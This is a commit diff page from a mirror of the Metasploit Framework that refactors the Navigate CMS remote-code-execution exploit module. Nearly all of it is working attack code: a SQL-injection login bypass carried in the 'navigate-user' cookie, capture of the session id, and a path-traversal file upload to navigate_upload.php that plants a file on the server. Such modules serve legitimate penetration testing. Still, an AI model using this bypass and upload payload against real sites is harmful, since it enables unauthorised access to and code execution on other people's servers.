infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Refactor again

GSoC/Meterpreter_Web_Console
Pyriphlegethon 2018-09-27 12:38:05 +02:00
parent 82b1f40925
commit 342cfe4199
1 changed files with 21 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
modules/exploits/multi/http/navigate_cms_rce.rb
View File

@ -51,18 +51,29 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def login_bypass def login_bypass
send_request_cgi( check_resp = send_request_cgi(
'method' => 'POST', 'method' => 'GET',
'cookie' => 'navigate-user=\" OR TRUE--%20',
'uri' => normalize_uri(target_uri.path, '/login.php') 'uri' => normalize_uri(target_uri.path, '/login.php')
) )
login_bypass_resp = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/login.php'),
'cookie' => 'navigate-user=\" OR TRUE--%20'
)
if login_bypass_resp &&
login_bypass_resp.code == 302 &&
check_resp.body.include?('Navigate CMS')
session_id = login_bypass_resp.get_cookies_parsed
.values.select { |v| v.to_s =~ /NVSID_/ }
.first.first
return session_id
end
end end
def check def check
check = login_bypass if login_bypass
if check &&
check.code == 302
return CheckCode::Vulnerable return CheckCode::Vulnerable
end end
@ -70,14 +81,9 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
init = login_bypass session_id = login_bypass
fail_with(Failure::Unreachable, 'Unable to reach target') unless init if session_id
session_id = init.get_cookies_parsed
.values.select { |v| v.to_s =~ /NVSID_/ }.first.first
if init.code == 302 && session_id
print_good('Login bypass successful') print_good('Login bypass successful')
else else
fail_with(Failure::NoAccess, 'Login bypass failed') fail_with(Failure::NoAccess, 'Login bypass failed')
@ -91,13 +97,12 @@ class MetasploitModule < Msf::Exploit::Remote
upload = send_request_cgi( upload = send_request_cgi(
'method' => 'POST', 'method' => 'POST',
'cookie' => init.get_cookies, 'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
'vars_get' => Hash[{ 'vars_get' => Hash[{
'session_id' => session_id, 'session_id' => session_id,
'engine' => 'picnik', 'engine' => 'picnik',
'id' => '../../../navigate_info.php' 'id' => '../../../navigate_info.php'
}.to_a.shuffle], }.to_a.shuffle],
'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}", 'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data_post 'data' => data_post
) )